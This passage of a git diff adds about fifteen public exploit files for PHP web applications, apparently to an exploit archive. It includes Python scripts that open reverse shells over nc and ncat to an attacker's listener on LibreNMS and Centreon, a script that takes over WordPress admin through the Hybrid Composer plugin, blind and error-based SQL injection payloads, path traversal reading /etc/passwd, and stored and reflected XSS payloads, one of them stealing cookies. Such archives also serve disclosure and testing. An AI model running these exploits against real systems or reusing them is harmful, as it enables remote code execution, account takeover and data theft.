+Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other
+website.
+Example #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">m0ze
+Example #2: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">m0ze
\ No newline at end of file
diff --git a/exploits/php/webapps/47044.py b/exploits/php/webapps/47044.py
new file mode 100755
index 000000000..17ae8afb0
--- /dev/null
+++ b/exploits/php/webapps/47044.py
@@ -0,0 +1,111 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
+# Date: 24/12/2018
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : CVE-2018-20434
+# Vendor Homepage: https://www.librenms.org/
+# Version: v1.46
+# Tested on: Ubuntu 18.04 / PHP 7.2.10
+'''
+
+import requests
+from urllib import urlencode
+import sys
+
+if len(sys.argv) != 5:
+    print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
+    sys.exit(0)
+
+# target (user input)
+target = sys.argv[1]
+
+# cookies (user input)
+raw_cookies = sys.argv[2]
+
+# remote host to connect to
+rhost = sys.argv[3]
+
+# remote port to connect to
+rport = sys.argv[4]
+
+# hostname to use (change it if you want)
+hostname = "dummydevice"
+
+# payload to create reverse shell
+payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport)
+
+# request headers
+headers = {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"
+    }
+
+# request cookies
+cookies = {}
+for cookie in raw_cookies.split(";"):
+    # print cookie
+    c = cookie.split("=")
+    cookies[c[0]] = c[1]
+
+
+def create_new_device(url):
+    raw_request = {
+        "hostname": hostname,
+        "snmp": "on",
+        "sysName": "",
+        "hardware": "",
+        "os": "",
+        "snmpver": "v2c",
+        "os_id": "",
+        "port": "",
+        "transport": "udp",
+        "port_assoc_mode": "ifIndex",
+        "community": payload,
+        "authlevel": "noAuthNoPriv",
+        "authname": "",
+        "authpass": "",
+        "cryptopass": "",
+        "authalgo": "MD5",
+        "cryptoalgo": "AES",
+        "force_add": "on",
+        "Submit": ""
+    }
+    full_url = url + "/addhost/"
+    request_body = urlencode(raw_request)
+
+    # send the device creation request
+    request = requests.post(
+        full_url, data=request_body, cookies=cookies, headers=headers
+    )
+    text = request.text
+    if "Device added" in text:
+        print "[+] Device Created Sucssfully"
+        return True
+    else:
+        print "[-] Cannot Create Device"
+        return False
+
+
+def request_exploit(url):
+    params = {
+        "id": "capture",
+        "format": "text",
+        "type": "snmpwalk",
+        "hostname": hostname
+        }
+
+    # send the payload call
+    request = requests.get(url + "/ajax_output.php",
+        params=params,
+        headers=headers,
+        cookies=cookies
+        )
+    text = request.text
+    if rhost in text:
+        print "[+] Done, check your nc !"
+
+
+if create_new_device(target):
+    request_exploit(target)
\ No newline at end of file
diff --git a/exploits/php/webapps/47045.txt b/exploits/php/webapps/47045.txt
new file mode 100644
index 000000000..6abd764fe
--- /dev/null
+++ b/exploits/php/webapps/47045.txt
@@ -0,0 +1,19 @@
+===========================================================================================
+# Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj.
+# Dork: N/A
+# Date: 01-05-2019
+# Exploit Author: Mehmet EMİROĞLU
+# Vendor Homepage: https://codecanyon.net/item/worksuite-project-management-system/20052522
+# Software Link: https://codecanyon.net/item/worksuite-project-management-system/20052522
+# Version: v2.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Worksuite is a project management software written in Laravel 5.4 (PHP Framework) which is specifically developed for freelancers and SMEs (Small/Medium sized enterprises). You can manage your company's daily work, your employee's tasks, keep a track on project's progress and much more. It is designed with latest security and code standards.
+===========================================================================================
+# POC - SQLi
+# Parameters : password
+# Attack Pattern : %27 RLIKE (case when  5021001=5021001 then 0x454d49524f474c55 else 0x28 end) and '7917'='7917
+# POST Method :
+http://localhost/worksuite24/public/login^_token=1knO8SR8Erjg56Mza4VaEv1Mb9lj5HiJBPmbTnFx&password=3115065[SQLINJECT HERE]
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/47046.txt b/exploits/php/webapps/47046.txt
new file mode 100644
index 000000000..58718f8cf
--- /dev/null
+++ b/exploits/php/webapps/47046.txt
@@ -0,0 +1,19 @@
+===========================================================================================
+# Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj.
+# Dork: N/A
+# Date: 27-05-2019
+# Exploit Author: Mehmet EMİROĞLU
+# Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489
+# Software Link: https://codecanyon.net/item/ciuis-crm/20473489
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Ciuis CRM you can easily manage your customer relationships and save time on your business.
+===========================================================================================
+# POC - SQLi
+# Parameters : eventType
+# Attack Pattern :
+-1+or+1%3d1+and(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# POST Method : http://localhost/ciuiscrm-16/calendar/addevent
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/47060.txt b/exploits/php/webapps/47060.txt
new file mode 100644
index 000000000..c5c184a06
--- /dev/null
+++ b/exploits/php/webapps/47060.txt
@@ -0,0 +1,15 @@
+# Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting (filters)
+# Google Dork: None
+# Date: 6/29/2019
+# Exploit Author: Joey Lane
+# Vendor Homepage: https://zoneminder.com
+# Software Link: https://github.com/ZoneMinder/zoneminder/releases
+# Version: 1.32.3
+# Tested on: Ubuntu 16.04
+# CVE : Pending
+
+ZoneMinder 1.32.3 contains a stored cross site scripting vulnerability in the 'Filters' page.  The 'Name' field used to create a new filter is not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Filters page.
+
+The following curl command injects an alert(1) payload into the vulnerable field.  The javascript is executed once a user visits the 'Filters' page.
+
+curl -X POST -H "Content-type: application/x-www-form-urlencoded" -d "Id=&action=Save&object=filter&filter%5BName%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5BQuery%5D%5Bsort_field%5D=Id&filter%5BQuery%5D%5Bsort_asc%5D=1&filter%5BQuery%5D%5Blimit%5D=100&filter%5BAutoExecuteCmd%5D=0&filter%5BAutoMoveTo%5D=&Save=Save" --cookie "zmSkin=classic; zmCSS=classic; ZMSESSID=(A VALID SESSION ID)" http://(A VALID HOST)/zm/index.php?view=filter&sort_field=StartTime&sort_asc=1
\ No newline at end of file
diff --git a/exploits/php/webapps/47069.py b/exploits/php/webapps/47069.py
new file mode 100755
index 000000000..98f0fe14f
--- /dev/null
+++ b/exploits/php/webapps/47069.py
@@ -0,0 +1,101 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
+# Date: 28/06/2019
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : CVE-2019-13024
+# Vendor Homepage: https://www.centreon.com/
+# Software link: https://download.centreon.com
+# Version: v19.04
+# Tested on: CentOS 7.6 / PHP 5.4.16
+'''
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+# turn off BeautifulSoup warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) != 6:
+    print(len(sys.argv))
+    print("[~] Usage : ./centreon-exploit.py url username password ip port")
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+request = requests.session()
+print("[+] Retrieving CSRF token to submit the login form")
+page = request.get(url+"/index.php")
+html_content = page.text
+soup = BeautifulSoup(html_content)
+token = soup.findAll('input')[3].get("value")
+
+login_info = {
+    "useralias": username,
+    "password": password,
+    "submitLogin": "Connect",
+    "centreon_token": token
+}
+login_request = request.post(url+"/index.php", login_info)
+print("[+] Login token is : {0}".format(token))
+if "Your credentials are incorrect." not in login_request.text:
+    print("[+] Logged In Sucssfully")
+    print("[+] Retrieving Poller token")
+
+    poller_configuration_page = url + "/main.get.php?p=60901"
+    get_poller_token = request.get(poller_configuration_page)
+    poller_html = get_poller_token.text
+    poller_soup = BeautifulSoup(poller_html)
+    poller_token = poller_soup.findAll('input')[24].get("value")
+    print("[+] Poller token is : {0}".format(poller_token))
+
+    payload_info = {
+        "name": "Central",
+        "ns_ip_address": "127.0.0.1",
+        # this value should be 1 always
+        "localhost[localhost]": "1",
+        "is_default[is_default]": "0",
+        "remote_id": "",
+        "ssh_port": "22",
+        "init_script": "centengine",
+        # this value contains the payload , you can change it as you want
+        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
+        "nagiostats_bin": "/usr/sbin/centenginestats",
+        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
+        "centreonbroker_cfg_path": "/etc/centreon-broker",
+        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
+        "centreonbroker_logs_path": "",
+        "centreonconnector_path": "/usr/lib64/centreon-connector",
+        "init_script_centreontrapd": "centreontrapd",
+        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
+        "ns_activate[ns_activate]": "1",
+        "submitC": "Save",
+        "id": "1",
+        "o": "c",
+        "centreon_token": poller_token,
+
+
+    }
+
+    send_payload = request.post(poller_configuration_page, payload_info)
+    print("[+] Injecting Done, triggering the payload")
+    print("[+] Check your netcat listener !")
+    generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
+    xml_page_data = {
+        "poller": "1",
+        "debug": "true",
+        "generate": "true",
+    }
+    request.post(generate_xml_page, xml_page_data)
+
+else:
+    print("[-] Wrong credentials")
+    exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/47075.txt b/exploits/php/webapps/47075.txt
new file mode 100644
index 000000000..35ef8199c
--- /dev/null
+++ b/exploits/php/webapps/47075.txt
@@ -0,0 +1,21 @@
+===========================================================================================
+# Exploit Title: Karenderia CMS 5.1 - LFI Vuln.
+# Dork: N/A
+# Date: 04-07-2019
+# Exploit Author: Mehmet EMIROGLU
+# Software Link:
+https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
+# Version: v5.3
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Karenderia Multiple Restaurant System is a
+restaurant food ordering and restaurant membership system.
+===========================================================================================
+# POC - Frame Inj
+# Parameters : f
+# Attack Pattern :
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion
+# GET Method :
+http://localhost/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/47077.txt b/exploits/php/webapps/47077.txt
new file mode 100644
index 000000000..d5fbc56a9
--- /dev/null
+++ b/exploits/php/webapps/47077.txt
@@ -0,0 +1,46 @@
+===========================================================================================
+# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
+# Dork: N/A
+# Date: 05-07-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: buyer2@codemywebapps.com
+# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
+# Version: v5.3
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Karenderia Multiple Restaurant System is a
+restaurant food ordering and restaurant membership system.
+===========================================================================================
+# POC - SQLi (Blind)
+# Parameters : street-name
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+
+# GET Method :
+http://localhost/kmrs/searcharea?st=Los%20Angeles,%20CA,%20United%20States&street-name=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
+"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
+# Dork: N/A
+# Date: 05-07-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: buyer2@codemywebapps.com
+# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
+# Version: v5.3
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Karenderia Multiple Restaurant System is a
+restaurant food ordering and restaurant membership system.
+===========================================================================================
+# POC - SQLi (Blind)
+# Parameters : category
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+# GET Method :
+http://localhost/kmrs/store/cuisine/?category=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
+"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/&page=2
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/47078.txt b/exploits/php/webapps/47078.txt
new file mode 100644
index 000000000..b49b41cb7
--- /dev/null
+++ b/exploits/php/webapps/47078.txt
@@ -0,0 +1,46 @@
+Exploit Title: WP Like Button 1.6.0 - Auth Bypass
+Date: 05-Jul-19
+Exploit Author: Benjamin Lim
+Vendor Homepage: http://www.crudlab.com
+Software Link: https://wordpress.org/plugins/wp-like-button/
+Version: 1.6.0
+CVE : CVE-2019-13344
+
+1. Product & Service Introduction:
+WP Like button allows you to add Facebook like button on your wordpress
+blog. You can also add Share button along with Like button or can add
+recommend button. As of now, the plugin has been downloaded 129,089 times
+and has 10,000+ active installs.
+
+2. Technical Details & Description:
+Authentication Bypass vulnerability in the WP Like Button (Free) plugin
+version 1.6.0 allows unauthenticated attackers to change the settings of
+the plugin. The contains() function in wp_like_button.php did not check if
+the current request is made by an authorized user, thus allowing any
+unauthenticated user to successfully update the settings of the plugin.
+
+3. Proof of Concept (PoC):
+For example, the curl command below allows an attacker to change the
+each_page_url parameter to https://hijack.com. This allows the attacker to
+hijack Facebook likes.
+
+curl -k -i --raw -X POST -d
+"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
+https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
+"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
+-H "Content-Type: application/x-www-form-urlencoded"
+
+4. Mitigation
+No update has been released by the vendor. Users are advised to switch to a
+different plugin.
+
+5. Disclosure Timeline
+2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
+2019/06/30 Second email sent to vendor (crudlab@gmail.com)
+2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
+Vendor did not acknowledge any emails.
+2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
+2018/07/05 Public disclosure
+
+6. Credits & Authors:
+Benjamin Lim - [https://limbenjamin.com]
\ No newline at end of file
diff --git a/exploits/php/webapps/47109.txt b/exploits/php/webapps/47109.txt
new file mode 100644
index 000000000..4556b8f30
--- /dev/null
+++ b/exploits/php/webapps/47109.txt
@@ -0,0 +1,64 @@
+# Exploit Title: MyT Project Management - User[username] Stored Cross Site
+Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://manageyourteam.net/index.html
+# Software Link: https://sourceforge.net/projects/myt/files/latest/download
+# Version: 1.5.1
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Software Description : MyT is an extremely powerful project management
+tool, and it's easy to use for both administrators and end-users with a
+really intuitive structure.
+# CVE : CVE-2019-13346
+==================================================================
+
+#Description: "User[username]" parameter has a xss vulnerability. Malicious
+code is being written to database while user is creating process.
+#to exploit vulnerability,add user that setting username as
+"<sCript>alert("XSS")</sCript>" malicious code.
+
+
+
+POST /myt-1.5.1/user/create HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/myt-1.5.1/user/create
+Content-Type: multipart/form-data;
+boundary=---------------------------1016442643560510919154680312
+Content-Length: 3921
+Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[username]"
+
+<sCript>alert("XSS")</sCript>
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[password]"
+
+12345
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[password_confirm]"
+
+12345
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[email]"
+
+ad1@gmail.com
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[name]"
+
+
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[surname]"
+
+
+.
+..snip
+..snip
+.
\ No newline at end of file
diff --git a/exploits/php/webapps/47121.txt b/exploits/php/webapps/47121.txt
new file mode 100644
index 000000000..b5c9bdc7a
--- /dev/null
+++ b/exploits/php/webapps/47121.txt
@@ -0,0 +1,33 @@
+# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
+# Date: 07-07-2019
+# Exploit Author: Mohammed Althibyani
+# Vendor Homepage: http://getflightpath.com
+# Software Link: http://getflightpath.com/project/9/releases
+# Version: < 4.8.2 & < 5.0-rc2
+# Tested on: Kali Linux
+# CVE : CVE-2019-13396
+
+
+# Parameters : include_form
+# POST Method:
+
+use the login form to get right form_token [ you can use wrong user/pass ]
+
+This is how to POST looks like:
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login
+
+
+# modfiy the POST request to be:
+
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+
+
+
+
+# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
\ No newline at end of file
diff --git a/exploits/php/webapps/47146.txt b/exploits/php/webapps/47146.txt
new file mode 100644
index 000000000..987fbb85b
--- /dev/null
+++ b/exploits/php/webapps/47146.txt
@@ -0,0 +1,60 @@
+# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting
+# Date: 2019-07-19
+# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://projectredcap.org
+# Software Link: https://projectredcap.org
+# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
+# Tested on: 9.1.0
+# CVE: CVE-2019-13029
+# Security advisory: https://gitlab.com/snippets/1874216
+
+### Stored XSS n°1 – Project name (found by Dylan GARNAUD)
+
+Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.
+
+- Where? In project name
+- Payload: `<BODY onKeyPress=alert("xss")>`
+- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages.
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified
+
+### Stored XSS n°2 – Calendar (found by Dylan GARNAUD)
+
+- Where? Calendar event
+- Payload: `<BODY onKeyPress=alert("xss")>`
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12
+
+### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD)
+
+- Where? Wherever there is a CSV upload feature with displayed parsed results
+- Payload:
+  ```csv
+  record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete
+  <script>alert("upload xss")</script>,,
+  ```
+- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered.
+- Privileges: It requires admin privileges to store it.
+- URL examples of execution:
+  + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index
+  + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16
+
+### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI)
+
+- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue)
+- Payload: `</textarea><svg/onload='alert("XSS survey queue")'>`
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16
+
+### Stored XSS n°5 – Survey (found by Alexandre ZANNI)
+
+- Where? In the survey management system.
+  + Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*).
+  + Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS.
+- Payload:
+  ```html
+  <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert('Survey XSS')</SCRIPT>"></BODY></HTML>
+  ```
+- Privileges:
+  + Store: It requires admin privileges to store it.
+  + Execute: Any unauthenticated user that can consult a survey.
\ No newline at end of file
diff --git a/exploits/php/webapps/47152.txt b/exploits/php/webapps/47152.txt
new file mode 100644
index 000000000..746561929
--- /dev/null
+++ b/exploits/php/webapps/47152.txt
@@ -0,0 +1,26 @@
+# Exploit Title: NoviSmart CMS SQL injection
+# Date: 23.7.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: http://www.novismart.com/
+# Version: Every version
+# CVE : CWE-89
+
+Vulnerable parameter: Referer (HTTP Header field)
+
+[GET Request]
+
+GET / HTTP/1.1
+Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Client-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-Host: localhost
+Accept-Language: en
+Via: 1.1 wa.www.test.com
+Origin: http://www.test.com/
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1
+Host: host
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+Accept: */*
\ No newline at end of file
diff --git a/exploits/php/webapps/47154.py b/exploits/php/webapps/47154.py
new file mode 100755
index 000000000..83949d9ce
--- /dev/null
+++ b/exploits/php/webapps/47154.py
@@ -0,0 +1,62 @@
+# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover)
+# Date: 2019-07-24
+# Vendor Homepage: http://wordpress.framework-y.com
+# Software Link:  http://wordpress.framework-y.com/hybrid-composer/
+# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452
+# Affected version: <= 1.4.6
+# Researcher: rootetsy
+# Exploit Author: yasin
+# Tested on: Linux
+# Vulnerability discovered by rootetsy
+
+ 
+# Summary
+The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table.
+
+# Description
+A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities.
+index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action.
+
+
+# Usage: python exploit.py 
+
+
+
+###########################################################
+import httplib, urllib
+import sys 
+import random
+# pip install httplib urllib random
+
+site = raw_input("[+] Target: ")
+url = "/wp-admin/admin-ajax.php"
+username = "user-%d" % random.randrange(1000000, 3000000)
+email = raw_input("[+] E-mail: ")
+  
+def ChangeOption(site, url, option_name, content):
+    params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
+    conn.request("POST", url, params, headers)
+    response = conn.getresponse()
+    data = response.read()
+    conn.close()
+registration_url= "/wp-login.php"
+def AdminTakeover(site, registration_url, user_login, user_email):
+    params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
+    conn.request("POST", registration_url, params, headers)
+    response = conn.getresponse()
+    data = response.read()
+    conn.close()
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")      
+print "[+] Registering new admin user"
+AdminTakeover(site, registration_url, username, email)
+print "[+] Check your email for password: " + username + "[" + email + "]"
+ChangeOption(site, url, "users_can_register", "0")
+ChangeOption(site, url, "default_role", "subscriber") 
+
+
+###########################################################
\ No newline at end of file
diff --git a/exploits/php/webapps/47159.txt b/exploits/php/webapps/47159.txt
new file mode 100644
index 000000000..ef945dcec
--- /dev/null
+++ b/exploits/php/webapps/47159.txt
@@ -0,0 +1,74 @@
+#-------------------------------------------------------
+# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]
+# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]
+# Date: [ 06/05/2019 ]
+# CVE: [ CVE-2019-13977 ]
+# Exploit Author:
+#     [ Fernando Pinheiro (n3k00n3) ]
+#     [ Victor Flores	(UserX) ]
+# Vendor Homepage: [
+https://www.ovidentia.org/
+]
+# Version: [ 8.4.3 ]
+# Tested on: [ Mac,linux - Firefox, safari ]
+# Download: [
+http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
+]
+#
+#           [ Kitsun3Sec Research Group ]
+#--------------------------------------------------------
+
+POC
+
+>========================================================
+                      Stored XSS
+>========================================================
+
+1. POST
+http://TARGET/ovidentia/index.php?tg=groups
+Field:
+		nom
+2. POST
+http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
+Fields:
+		Nom
+		Description
+3. GET
+http://TARGET/ovidentia/index.php?tg=delegat
+Show groups
+4. POST
+http://TARGET/ovidentia/index.php?tg=site&idx=create
+
+http://TARGET/ovidentia/index.php?tg=site&item=4
+Fields:
+		Nom
+		address
+		description
+5. POST
+http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
+Fields:
+		Libellé du champ
+	Explosion:
+http://TARGET/ovidentia/index.php?tg=forums&idx=notices
+
+http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
+
+http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
+6. POST
+http://TARGET/ovidentia/index.php?tg=notes&idx=Create
+Fields: Notes
+	Explosion:
+http://TARGET/ovidentia/index.php?tg=notes&idx=List
+7. POST
+http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
+Fields: all
+	Explosion:
+http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
+>========================================================
+                    REFLECTED
+>========================================================
+
+1. GET
+http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
+
+Sent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.
\ No newline at end of file
diff --git a/exploits/php/webapps/47160.txt b/exploits/php/webapps/47160.txt
new file mode 100644
index 000000000..0eaacfc2f
--- /dev/null
+++ b/exploits/php/webapps/47160.txt
@@ -0,0 +1,37 @@
+#-------------------------------------------------------
+# Exploit Title: [ Ovidentia CMS - SQL Injection (Authenticated) ]
+# Date: [ 06/05/2019 ]
